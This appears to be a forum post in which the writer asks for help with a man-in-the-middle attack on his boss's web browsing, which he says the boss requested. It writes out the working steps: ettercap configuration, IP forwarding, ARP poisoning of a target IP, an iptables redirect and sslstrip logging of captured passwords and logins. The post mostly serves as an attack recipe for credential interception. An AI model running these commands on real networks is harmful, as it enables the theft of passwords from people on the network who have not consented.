As I sit here watching my boss surf the net in firefox (he asked me to see what I could exploit) using ettercap with the remote_brower plugin I got a little anoyed to see that some of the sites he rolled into were SSL. No big deal I was thinking.
Now I got the http sites rolling into firefox and the SSLstrip just passing password, logins and other junk into the log file.
What I want is the SSL sites also rolling into firefox and not just passing the passworld to the log file. I am guessing it has something to do with remote_browser not listening to SSLstrip after its done its magic on port 8080 or something along that line. Everything else works just fine.first fixed the /etc/etter.conf
ec_uid = 0
ec_gid = 0
remote_browser = "firefox -remote openurl(h t t p://%host%url)"
Then just fired off
# echo "1" > /proc/sys/net/ipv4/ip_forward
# xhost local:root
# ettercap -T -q -i wlan0 -M arp /192.168.0.101(boss ip)/ //
(You can do the above ettercap in one command but it seems a little unstable)
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# python ./sslstrip.py -p -f -l 8080
All the best
Let me explain officer, I am not a hacker. I am a security tester of sorts!